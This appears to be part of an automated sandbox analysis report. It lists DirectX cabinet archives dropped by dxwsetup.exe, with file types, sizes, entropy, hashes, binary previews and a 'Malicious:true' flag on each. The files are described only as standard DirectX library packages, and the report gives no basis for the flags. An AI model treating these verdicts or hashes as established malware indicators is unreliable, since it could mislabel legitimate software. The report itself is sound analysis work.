                                                                                              Preview:MSCF.....>......D............................>...#..............v.....:........8wq..d3dx9_38.dll.<'....:....8.r..d3dx9_38_x86.cat.....D.:....8.r..d3dx9_38_x86.inf.,...O.:....8.r..d3dx9_38_x86_xp.inf.\...{.:....8.r..Jun2008_d3dx9_38_x86.inf. .,:..[.... .,......$Q.f...<....B..W...WWRT%.*,..6mZ....k.!H}_.aAkk..C..............Z...1.5.!....S.-.Uy....# ...g....3...q.u.N..Nz.2Zq..D..+r."S9..ZT$.QD...UM..4......P....@...f.h...}..l7.{l.e7..#.b.$_...Q_...#......CC@)@......@......1...`....D.$m....wgg...B...n..E..{x,u.{.VK.;:.7.M$IO3v.u..v.p.%...N.X/.:Q..E...(/n..%Y...."..X.)}U.5...9F\.C>.....9..L.1.T.....4I.$R...5.L'.e.H.`.....H.._....9...XQS....r..>H.Gw..I.}.I...S.M.#Q....a[.....C.o...HR6|..#....Ccu.^....=...f.N..LH.nMzk.k.....k..V..S..^.^,BdOQ.E..^.q..y.z.A{x..g8....i.....l.....f...a,..\xzC...r.@...C~....\.....!8..)....ZU ..%.e.xG..<.i.*....yVH.AA......M.F....Ph..,.Uap.....9...-...v.V.... |..*......X...6....P...,.K.O.Qe...).]`..C..............,..+.q.........w...

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2010_D3DCompiler_43_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 925511 bytes, 5 files, at 0x44 "D3DCompiler_43.dll" "D3DCompiler_43_x86.cat", flags 0x4, ID 10023, number 1, extra bytes 20 in head, 65 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):934679
                                                                                              Entropy (8bit):7.998315243107519
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:pOWjUzqd7URYQio4yGDUATxoWDYicd3qRbmXHphTheb:ptx6RYQiL1DUA7EicSbUJhIb
                                                                                              MD5:E7DFA140CB0AE502048ECDF1E42360E6
                                                                                              SHA1:4DB08318F78F076FCC6FF29737B3D6D676F59C54
                                                                                              SHA-256:293CED557AD732ABD2737333DF39B08216F31601D7AB65B743FE51B4EFB8B6F0
                                                                                              SHA-512:39B69A5CC4A50DE72D031C41879ED7644B577A9E3E3B44BFECC61D5312C7C32C964DC2CD37DB711F7E486F444CA77FE732C642F3E494E6DA1BC1CF774D9EF75C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....G.......D...............''..........G....#..............A...h# ........<!]..D3DCompiler_43.dll.....h# ....<B'..D3DCompiler_43_x86.cat.!....= ....<.&..D3DCompiler_43_x86.inf.<....A ....<.&..D3DCompiler_43_x86_xp.inf.....QC ....<.&..JUN2010_D3DCompiler_43_x86.inf.W...P!..CK.[{|[.}?.J..'r.$...k.I........;/.`HZBG.e..V.....C....e@..i.%.@C.:.e..2F..t..A...n.i..e..F...s.W..,.l.g...7.{~.....y.k....`...06..1._.l...af..3..S^.<&my.r[. .h.p_.;....P8...J$.R.!...@.:g.Z.......;...s.}.m.....)...U.....4.H..m....u.]s......A.....d.]..."YYK.....&WN..2v..._........*.?vq/3fc.@^.XSD.zD.:.K.a.Mt..........r...LT...C1.+........s..(d.,G.O.l..:y\.X..S.bD.. /..5S.2.v..1/...<r_G.b6^..3....^.@.._5.f.vgD..I..gznTl...[w......p.y[....u...B...v..........&.%..].u.:....}...{..".)..........;......*B1.Jx.b9I8Ax.p.p.PF...........F.".".....|.^%.Hx....;.#.{.......1..B7a.a....$T.J.3.V....=..7./......%<F8B...v.....C.N.$<Hy|.p....Y..W.'.....\i..J(&(.%.....0.S.=y_..........F..[Jp.1......(-.....

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2010_d3dcsx_43_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 756228 bytes, 5 files, at 0x44 "d3dcsx_43.dll" "d3dcsx_43_x86.cat", flags 0x4, ID 7878, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):765396
                                                                                              Entropy (8bit):7.996955154936438
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:C8Dx0/99rEneJVyrxcsaWmeUEEBTJNCK/FcZZXlewc3/2tqCyrIUl3z82ItDwh2Z:XDO19AVrRfEHNZWZrs3+ICyco3MDISTT
                                                                                              MD5:E34C0CF1BD5A68C80BDC709A452EB322
                                                                                              SHA1:4DD4553EC7E2E42D51A716B1F4CB58588BCAA164
                                                                                              SHA-256:799B517227812252481C9C9B22CF16FF185FFC20B9273612C8A37153B53AAD93
                                                                                              SHA-512:3488A52F6FD3681B10624546B923368245F969330D4909E91C5B58F159CD24B258A8A2274D62243CA5CA9F1FB40F9F248B3BD92283F775DD24BAF68ECC5FD03D
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............:...`..........<!]..d3dcsx_43.dll.....`......<B'..d3dcsx_43_x86.cat...........<.&..d3dcsx_43_x86.inf.(..........<.&..d3dcsx_43_x86_xp.inf.c..........<.&..JUN2010_d3dcsx_43_x86.inf.UR.....CK.{t.e.....6.I.Zp....a/.v.U#.Hi.%..V.f......&[(. .R..l.Tm4VA..."..-JA.Z.@....J.....x.....$.|..y|....fv7..._..wf.-.N.QJ..z.......Q.....<aG....=5.K...,......^.....]]....`..`GWp.9........S..c...>9kG.P.M...\......^O..[:.7.5..s.....|.........#.|.....TS.Xu0.....W.5.J...G....{.....*8.E...J.:B..l...9...........E..Q..'8j.....u.a.V.T.$Y.....O.V*..?.HW.._..........rMiA..g.;r....M'.Iy>9Z...!Y.sF.'......<.}..<......X....o;5..T.,..g.3|.....\....QOK.#5 .Vj....3."R'J...z.Q......n..R}R.K.J.:Ej..*.uHj..CR;.6K...>...QWK.Im..U.A.g...'.N..J.,..j.:Kj.....R.H]..Nj.TV~6#.Tj.T.T...R.R..;j...R.H.H....|.5..'.d...z.kU.eR....z..d....*...PO.6..J....ZT...t8T..d...D8.ji2.Lf$..lGw....7^s............k.j.q/...\.f..}ek'....

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2010_d3dx10_43_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 191323 bytes, 5 files, at 0x44 "d3dx10_43.dll" "d3dx10_43_x86.cat", flags 0x4, ID 7293, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):200491
                                                                                              Entropy (8bit):7.9966634458730566
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:kD2Fju8h1xkWCD/5e8U2LK1aQAMxVz2aoOxoY4+ApyP0EwMGvFas+8QJgdBvCD7D:kwbCleyYagxVCaoV+ApcnG9aKQJaw/
                                                                                              MD5:591A61BD06C73C70F93DAC5AF2D8E924
                                                                                              SHA1:C9D36AC5E2ACAC31A7413D22ED1C09C71CC96FFB
                                                                                              SHA-256:F0BC06CEB484D97CF01526F9223DF7B4357D166C4391869F2E7D514DC1FE769B
                                                                                              SHA-512:3E2E3318A700A6ED82A21018403CA99728C8A56B7DF81F99A5D705B586CEE1141586DBF19A01EF1F1A72DDC8F45DDB51BA5769AE4634B02233EF1AC4E0FBA5D4
                                                                                              Malicious:true
                                                                                              Preview:MSCF....[.......D...............}...........[....#..................`/.........<!]..d3dx10_43.dll.....`/.....<B'..d3dx10_43_x86.cat......I.....<.&..d3dx10_43_x86.inf.(....L.....<.&..d3dx10_43_x86_xp.inf.c....O.....<.&..JUN2010_d3dx10_43_x86.inf..=.h`1..CK..T.I....8*....ePQP....SENJ..1 q....a@EE.a]E.5....F.t...s.v.iM._W7+..:..........oW.*NMM....e...1.*+.f.#..2.....7.S..V..|..O.yX.2]..Q'jbReq1*.Z+.U.4.*.R%........6....<./...gU.g.)...u.y....dj.....UJ'j....[/.../E....e\.._...^..Gb..}.*...37..2L..a..q...../.|...z.#e$.ZU7...vnkmh?W....-..L^...h.0.....>.Y._....f.......vpO#.1..6_U.o.......h.#.`.d....j.F.0.6.1..>.H...`'J..A.%6.tM.\.:<.......F...!.K......?t.:...../...2..=...2....&e^...I.M`........H."........@&0.X...%.1..p.h3L(..V....K...5....X........x.]..@}.F.8.......%.T`.....=...!...x`40...v.g...k..6...@. .......wh.@ .......F..+..#`.....p_-e*.3...^`+....&..@.......o....:.... ....c.&p.8.....6.K..@......e~....H.w..R..........`.0.X....G..`)k.8...-0.....n.....R......f..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2010_d3dx11_43_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 103485 bytes, 5 files, at 0x44 "d3dx11_43.dll" "d3dx11_43_x86.cat", flags 0x4, ID 7298, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):112653
                                                                                              Entropy (8bit):7.991810619702373
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:tXMVzDTlrM28bEHSqgik2ono4DQQ/7cuBFbb9aD4:tXMxNjG4gikye5FBtBr
                                                                                              MD5:061BBA3836B3FFCBB01B150467BBE951
                                                                                              SHA1:00D8FBCD4068B3199D3D393BB4B86BF82985480D
                                                                                              SHA-256:B80DB68CD82CAF8BEDAEE62808171B20C546A76499C3AD53014E3BD2FBD2918D
                                                                                              SHA-512:AEC8327E1CCC0B33B3E32D66A5EE25C4B70A227B708D10F61EBAD2D998F3BE68145FA85C50BAA16A21EE766B336B1432FBEC02C75D698793092015C832B6FC26
                                                                                              Malicious:true
                                                                                              Preview:MSCF....=.......D...........................=....#..................`..........<!]..d3dx11_43.dll.....`......<B'..d3dx11_43_x86.cat............<.&..d3dx11_43_x86.inf.(..........<.&..d3dx11_43_x86_xp.inf.c..........<.&..JUN2010_d3dx11_43_x86.inf.kK.*. ..CK.|.\.U........:(.....;.........\.".+...K......a....f*.eZVZf../M.2M1M35.bj..%~gf.,gv.........~>..<..{.y.93.{fv.c..(%EQ*d......?...?...z.i.^u=.g.b..>.%....*..*s...\Qa..'[.U5....c|Z...Zl.....m....\u....s....|.....2...s..*.rE^ Wn..J..j|.$...2....mO.ul.E.V..c.7R...E..+t...2p....@>.V`..<.).Rp..*_UrI{h.../Z..0|...sQJ*ACQ..J....*.F%..W.T..*....E.{P.....1..A..U.6...2.J..|^a|.....Zl....|.>.tT.P.x..=C.......V..b'^..*K....}.s...op.....?..'=...2T>.l).....l.2Od?E*.S.....V .GV.l<.Q. .Bv.]7......d...MB..,..72Od..WR...D.6.M.V!{...d%..B...@.L..j..:..(.=.G....b..BV.l...d....B........p%u....F.....l.!.G..l.2.,.. d...|..Qm.v....G..L...).C..c.#.Ih...................ee.......VPL....8X...H1.=A1...q....2.E!.l..M.E..jTw.z.y..*d....m...Y.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Jun2010_d3dx9_43_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 762076 bytes, 5 files, at 0x44 "d3dx9_43.dll" "d3dx9_43_x86.cat", flags 0x4, ID 7093, number 1, extra bytes 20 in head, 62 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):771244
                                                                                              Entropy (8bit):7.999380380890997
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:E0b5pTUIVIRxV+yb+HJFnXQRGr85UpzQ3VztxmHN8DMFy0BJ1lSIug3SqHAlzJYf:l51NVO+XVLs3VztQHmYjBJb931I1NYI0
                                                                                              MD5:BF124B64FC3774F61D30DE0A405F0C6C
                                                                                              SHA1:2F8A8BABFA4E51555FCF125E8373D9C5F7F7434A
                                                                                              SHA-256:457C5CE48EAA0FE551B46DFFC1E4DCA985D261686D8D4E6BCED533EE1F682FCE
                                                                                              SHA-512:935922CE74BD399E8358693562F86C9B4B6308A6E33586A5DD61924F8B6B2CFD6CB2E472FD082B9EA32C0ABB9A799A0BA9103B4C316342F8072A7A3782C2116C
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D...............................#..............>...X}.........<!]..d3dx9_43.dll.....X}.....<C'..d3dx9_43_x86.cat...........<.&..d3dx9_43_x86.inf.,.........<.&..d3dx9_43_x86_xp.inf.\..........<.&..JUN2010_d3dx9_43_x86.inf.[.'.":..[.... .......5!.P..wOnf..O..........9vm..o..f.6.....+I).H]..t.....T...v.!..M.......>>.{..._..t....g...:..jh.N....K...vJ.r.. ....;J.zq.....*....H....'....d.=...{O.4.xIBC..L7..2....... ..E5`5`........<s...9..(.b3. .."t....M\.;...0......*...H....K.5$...L.Ha....%..e..V........{.t....#3kk.sR6.....I.u.Em....b.Dl'.E.[.D.N....m53%...'.m;.>..yf.6..pN..N.y...-.5Y...f.......-.B#.......;.D]......G.8.5...*G.......x..}...!.GwT.......WwKuT...Y.l[f..}ji...{.h{...x.u.....>..1....k..v.D."W..ZA..<...7=c2QN.Y.......v..k&aHudg.W...`HbV{.Q..CJk..nLpw..#.&5.%S...G.&.`....]...EpFY...(....P\..+/`..&..ap....S....BR..'....s..c........p..B..j*....c..D....mU.x....N.r..QfEz`...}.._...........8..$..........!.G...i.@..P...."c..d.L00...QX.B0.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Mar2008_d3dx10_37_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 812300 bytes, 6 files, at 0x44 "d3dx10_37.dll" "D3DCompiler_37.dll", flags 0x4, ID 8943, number 1, extra bytes 20 in head, 58 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):821468
                                                                                              Entropy (8bit):7.9989494569533655
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:k8Yjgk28yEYvDLX3XmZcLHo9yLvTJqnrT+LprnNjjjGM6pdKi814DYnciABrI55V:1Yjp/yEcfLI9y4rORNYdKibxBrIS6
                                                                                              MD5:8234B9B90BCBB5077E1B5FAA0B66D1A9
                                                                                              SHA1:E9207C572FDEC592B7C17A7F9C6F875C8A55B1F0
                                                                                              SHA-256:6A2727269E6CAC7C4D2E316333D29BAC0DC1CD7F51C36C0C08B0388203DEDAD2
                                                                                              SHA-512:74C94A6E092D7C828FC1E3FAEE4B21917AFC3CACEC04F260754190D0533F93A58289763AC620E5A577F7865902023B30548CDA4D9E968C90EE13050AD6D1E8C5
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....e......D................"...........e...#..............:.............E8...d3dx10_37.dll...........e8....D3DCompiler_37.dll.f(..(.....e8K...d3dx10_37_x86.cat.I.........e8....d3dx10_37_x86.inf.i.........e8....d3dx10_37_x86_xp.inf.c...@.....e8....Mar2008_d3dx10_37_x86.inf...-..,..CK..\TU........[fz.,P..0}Q.a.L...T..`.f.;........i..io{n.*...ej.i.Yb........;w....r.....s...9.<g.%f.4.F.q...F.*"_zr.........6.4}..I.8.;o..9L..j.9.43..Z.....M`rl&..A.....n.b..Q.....;..).).MK{J...!...1..T'....:..&...,*O.k\.!}4.d.vH/5.0.....x-!.....{.c..@......Dm53SG.W..A..5..MK..P.?ZK64'd..%.4p......'..v.a-..3!...iYM...Jc.B.i..^.4.;.....b....:..i..'Ui{2.$m.t(w..w...Km..ZrM:..7g.p.w.m$..k..`..n..7JK.`...%..O..d..`....@2h.j.s.ZR.V....?..p-i.:../...@.X.&..:RK..y`"p.. ...a..\.@Y..l...<0.lB|6.d...Ac..N..=`.(..@.._.....)...`(....\..|....@.~i..-....z}.........]..'.........<0...d...A.h......e..@...6....,.....D0..A....A8...@K.a..6/.\.&t.$/.V.I.....f.".....t.$.....H..X.6....$

                                                                                              C:\Windows\SysWOW64\directx\websetup\Mar2008_d3dx9_37_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1437322 bytes, 5 files, at 0x44 "d3dx9_37.dll" "d3dx9_37_x86.cat", flags 0x4, ID 7166, number 1, extra bytes 20 in head, 116 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1446490
                                                                                              Entropy (8bit):7.99972380205062
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:vFs/gTzoeHhwLMLDjl5XbCzgxt0Q98wWz35UM0vE03yYCmPI7ik:veKTHhbLDbDP0Q5UUtBC2PAz
                                                                                              MD5:8ED75E3205C2B989FF2B5A7D2F0BA2DF
                                                                                              SHA1:88846203588464C0BA19907C126C72F7D683B793
                                                                                              SHA-256:91A50D9EFCDFBCDF22A91D6FBB0F50D3C2AA75F926D05CC166020BF7AAF30E28
                                                                                              SHA-512:D0CF0E3AAD9C8C43A927D1BBBD253B9FE4C97B638AD9A56F671EBEDA68FC9BC17CC980D93095FBB248DD61DC11B7E46C22D72CEE848B150F7A13EAD9E08A7891
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..............t.....9.......e8....d3dx9_37.dll.<'....9...e8I...d3dx9_37_x86.cat.....D.9...e8....d3dx9_37_x86.inf.,...O.9...e8....d3dx9_37_x86_xp.inf.\...{.9...e8....Mar2008_d3dx9_37_x86.inf..$.0:..[.... 92......$Q.f...>J...h.].W...uWL.I...W]J.X..V..{..Z........X.G{<..033.4..P..........ek |.b./..gFB'S...K.....fe.5.u..T<{..H....XG84QbDR.8X.Hf.H..46...H"0 ..HH.S............*.(_ ..w...H.....Q..P..vT.t@.G+...1...YH... V..Y4H..P..1R$l/..20!ls'...;....;..kmttyu...x.s....q.....q$.C..5k....(....B.r..y..<.6...Fz..hn..-.....Q.3Z...@.1.V..S?...a|....(6.......D. ....)Ej....GJ%.5 ........G.w>......p...i}..<.|..b.&!..7E.yU.O-.D......O.UC..yIA.Aj.._..D...VOc....{.f]J.<...r.)o.|-...>.PWF.....;.;..vb....4..QV'f.$......:S.hi...~...}3k......\...}a.......L5..*e....|.....1..n...T...t......[....Z.].e....d.A......'..|.V.2.|Ax..W..........B.>...x.. ..|.`...L.h..H.i.....@-.aa...7...K ...../..l.x....r...0>x..@/X...W..L..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Mar2009_d3dx10_41_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1034785 bytes, 6 files, at 0x44 "d3dx10_41.dll" "D3DCompiler_41.dll", flags 0x4, ID 8914, number 1, extra bytes 20 in head, 71 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1043953
                                                                                              Entropy (8bit):7.998757160305283
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JAEjuCeK6JgAkPBJoBgsqDP8FbGACV0L/sW0G+vv2:JFuCeVJqyxqDUFb9CV8r
                                                                                              MD5:45E83CBA5710A1DE7D3990A288122E85
                                                                                              SHA1:23C4BFBDDCFB11ACB7C47C409825F039AF7EB908
                                                                                              SHA-256:B7DA29103CDF374DE0C09713CB985035EAC45FB8B394D3B8157D8A7562A89899
                                                                                              SHA-512:8C56D376D349AA00948E1F3C6168DADE76AC9A26ADE1AAC5A385DCF0253602F5A2973483D083425195DB6AD7717494FD3CF674F5549774AC608CEFA2A88BF0A7
                                                                                              Malicious:true
                                                                                              Preview:MSCF....!.......D................"..........!....#..............G...P.........i:k{..d3dx10_41.dll.h-..P.....i:k{..D3DCompiler_41.dll.......#...p:.r..d3dx10_41_x86.cat.I...a4#...p:.r..d3dx10_41_x86.inf.i....7#...p:.r..d3dx10_41_x86_xp.inf.c....:#...p:.r..Mar2009_d3dx10_41_x86.inf.Nn.>.0..CK.wT.I..{.G.C.QQ.#(I.T`..Q.........0.b..5`Xs..bD.@..f1.9..x....Yw..{...s..U...[.kjj.....h3...TV2.nFx92?~=....m.l.[n.[..(81)]..R&..Sd...J.,F!Se..Re..A..e..~}..b.e[.fd.np.+..[......R;.z.....v....N.~...ibx.h.S.....W...7..-.a.8...`...$u..A.0K....j1..g..A.^k1...Pj.]bm.ym..~t...+d..`*..LG}..X...#.J.....;'e.Z.-.2..m.0....[W..#......j.05.Z.R.!..:.jd..e.........O..7:...\....k..bY...s4W).. ..%.......:g............p..Z...... ..<5.2..].... ..X.,..!~.0...v..k.c.1.2..V.10.L.#.R.x.=.S.9.....27.S@.....d.* .p.l.d......}.\...;.e./.0 ...&.~...8.\...:.L;.'....R..."`;p.....>...........BhW6.I&..D.!.3`...M...>u.....S.A......E@...0.P..@8....v.9....X@..."e....'..`c...(...^..R.'p...4....{ ...f...2....h

                                                                                              C:\Windows\SysWOW64\directx\websetup\Mar2009_d3dx9_41_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1606486 bytes, 5 files, at 0x44 "d3dx9_41.dll" "d3dx9_41_x86.cat", flags 0x4, ID 7142, number 1, extra bytes 20 in head, 128 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1615654
                                                                                              Entropy (8bit):7.999772423092358
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:xFtN95ew18Yl4WTrZnZSibmmq18Whxp9pWISiIz9cXwowwenm2AB4qDA2mV7Q:newRFZ8ib6T3p9pW9/Z4bM/XkA+
                                                                                              MD5:901567428D8C82756D7BF5A406441BD7
                                                                                              SHA1:6E3C22147F3DA77AC8F20D615CA32B5EF2A0ED28
                                                                                              SHA-256:32356344AEDDF709C9D5302D8F3FCC1FF1BE2E82D8D17833A2086400AF248794
                                                                                              SHA-512:6FD4C429E32480BDFF4E58BA8BC0D28FE97C9FF5EF1FABBB856230EFA669246A354F99B723E7483D548B74C121AC8BA9CBA2B5BC3C18F35EE828302D392CF6ED
                                                                                              Malicious:true
                                                                                              Preview:MSCF....V.......D...........................V....#..................X.?.......i:k{..d3dx9_41.dll.....X.?...p:.r..d3dx9_41_x86.cat.......?...p:.r..d3dx9_41_x86.inf.,.....?...p:.r..d3dx9_41_x86_xp.inf.\.....?...p:.r..Mar2009_d3dx9_41_x86.inf.x..#.9..[.... .3......$Q.f...<...!..vW]....]eJ.*Uaq....a.Zk....}_..=hk..C.=...."......?1<..izt.`Y.._ .....H.`...uI35.:.,L.....I.;...........&...B......I....!@.A...A....a......................#..&.E....J..%. ......!..Q0..P.F......$.!...q..yXf..d....7,v......Y.....Q......EI.&..Rm....d.I....D........WJ...`.u..WK..K........yQo...2...W.U\.C.m...a.k.kpq.U..C.5.Hh).......<R.s.l.+.......);........%.g.g.....i..I.U.).H......l./._...<.C....a....U8.'.,.0GR....=.5....E.......jln..MKiliw..Q......,.2{..k...\.X$.......Q4..??...ns...?*....t.|.8U..>WJ./.>S..Vp.....0...3 ....'!*....,R........Ph..#.t*.7=.?p....D.....hX..H....J.`...Z.......$7t.......a...|S....(..G. ...V+`...,.X.P..lZ`...X>Bt....E*aM..(`..0......BA3..p.%..OE.c``.BU....).P5

                                                                                              C:\Windows\SysWOW64\directx\websetup\Nov2007_d3dx10_36_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 797924 bytes, 6 files, at 0x44 +A "d3dx10_36_x86.cat" +A "d3dcompiler_36.dll", flags 0x4, ID 9083, number 1, extra bytes 20 in head, 56 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):807092
                                                                                              Entropy (8bit):7.998858073625772
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:EL+Y8gC2xQcaINcDDHwNXjNOl93uN850V7ZcR0SEDR3l3M:vD2xaINcDHIzhs0Vwz6c
                                                                                              MD5:3D9A0C59156D03DA0F19C2440E695637
                                                                                              SHA1:55B050991CB17410C75ADC3913066BAEDB482ED0
                                                                                              SHA-256:BDF7FB01C02783A4F8C9F5E7911F5CAE3E2A7CBC425B90B36F9EA6EEF2C27DE3
                                                                                              SHA-512:E9A662498C43865E917F0778B772D6964517E41289CBF5A0B8A4E44D8C4B4E9A5049C76F2ECBE4ACC7E9CFCC3F1D87A75C3F8703E66804CE758969814BA14FDA
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....,......D...............{#...........,...#..............8...h(........V7.. .d3dx10_36_x86.cat.....h(....L7.y .d3dcompiler_36.dll.h.... ....B7.O .d3dx10_36.dll.I.........V7P. .d3dx10_36_x86.inf.i...1.....V7P. .d3dx10_36_x86_xp.inf.c.........V7P. .nov2007_d3dx10_36_x86.inf..d.....CK..8.....Y..^(4cK.......H....0..F.]1..$.(W...P.-..J.).[*.%Q....M.v......>Os.c.......=.|.}..d*.r.5....q.s.J..*k8....y89....e...D...Q.!aL./,..l...@~N..J~..)...=..].)......o.@.... ......,R...".@&L.i..........Z.6`..C.......]6.Z.._V..J T.B......l......,..t.6.....md.p..5...l.....B...aI,.F.mU..<T...@Hf.......d{..... ..1.0$.....j.AE..#'..'.%..%....4..p..P.g%..(.H..d..........R#..L..H. mXq..c......6tU$....cii.e............1dA...f.... .........U.B..b.....Fj.z;x...f2. gY.....9.u24. .O&....!E-.....R.d+...5.b..![.dG.....""{U.C...........9p.M....Y|.\f......E....).J...d..0.l.A......0$.....}....e......t..^W..LM(.$,... +.....A..K...f.p..dD...,..E2n..2/k-...d.E2.-.@.S...1.........pA..H..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Nov2007_d3dx9_36_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1703400 bytes, 5 files, at 0x44 +A "d3dx9_36_x86.cat" +A "d3dx9_36.dll", flags 0x4, ID 7211, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1712568
                                                                                              Entropy (8bit):7.999078652914364
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:fMb9V3TN8vuaBYlFhEbpdjRsI+CpoUjrn++qWYxhiUX21LVpmI9P2BZbcNU7YBP1:kJEvlmFMpdj/Npocz++q3X2tnLAcm0Bt
                                                                                              MD5:C5E127067EE6CACDD2F8962E6005542E
                                                                                              SHA1:22C571E4DA75A6E5DFE02E3E3587F40C2939C745
                                                                                              SHA-256:F52CC1304B533083B3FC5553C49433C0E4E46D66D567B9DE0B558CA518DB1544
                                                                                              SHA-512:E70DF11AF8CB5D51C3111B8327371EA40292580F06D7D265F2449B89A4941C4740BDE904367FBCB4158512939BBD7C7A3DC20D3642475789FC075A2AE8E27860
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............+................#..............s...>'........V7.. .d3dx9_36_x86.cat...8.>'....L7.y .d3dx9_36.dll.....F#9...V7O. .d3dx9_36_x86.inf.,...Q&9...V7O. .d3dx9_36_x86_xp.inf.\...}(9...V7O. .nov2007_d3dx9_36_x86.inf..*G~.;..CK..TS..._....E..)...!4...iR.....Z."] .."......K..T@.B.....]....|...w......y...w.3w..7..//s..R3...H.N{/..F.Yj..J..@..a^.........,.a.^M....".!.,T>......T. .h..-..]./.8.^..../%..q0....x..',4.....Y.9...2..!+...!]Pp.J.`...=.B.W<(.........d.d.l/.Xq,9}9> ..l.}....@......R.dY.x.8@.(..C!.?...)....f.-a.l.+6..U..vbO.q.%]s.....H...$g.... .=...l8. X2.I@.b....Y.V"...[..f5{.$`K.e3.....PE;.Nx`@.f..$....r...i>[..$]`A.:.....jv~.gg...Y....M.....x7...H..'.J.y..oV......j.aU...fc....U..i.....B.q..N>...`........`H9XVN.r..![.+..!H...B..i.-....r...f`l....V.?{.z..H.Ym../.o...Q...p....<d..,....9.7O..c....d.<.`.L..!..{...b .>.QH..)..B.........,...Hx..$a8N.^.rE.+Z..c#h...Xu..,.D"b.h..z$=....G./...l....z./.F..)..v....v':..5....G...... ...p

                                                                                              C:\Windows\SysWOW64\directx\websetup\Nov2008_d3dx10_40_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 959461 bytes, 6 files, at 0x44 "d3dx10_40.dll" "D3DCompiler_40.dll", flags 0x4, ID 8926, number 1, extra bytes 20 in head, 77 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):968629
                                                                                              Entropy (8bit):7.999011847061652
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:JKTxCzc8gSDnU8Hz10a0s65QckarHGlImJtXn+QbtU0sHsqzn:mxCzs29r0WQma69nBbtU0sjzn
                                                                                              MD5:5DFEB46E60795266DA03F2D0A67E7ACD
                                                                                              SHA1:A77758873E5544E8AD22ACF469C4A0FD0C944A88
                                                                                              SHA-256:EC52B075A3E9C7FE468B317E0FF977964B1003D560065128741F4392BF47C49A
                                                                                              SHA-512:6EC058811AC017BE3CD3A46559CD73126666F41B0FA58D92C1168CF2A2E0E2357B19F65531C786EC81A438975DBECE440C5E7B6C653AFA5428CE6C444179AF6C
                                                                                              Malicious:true
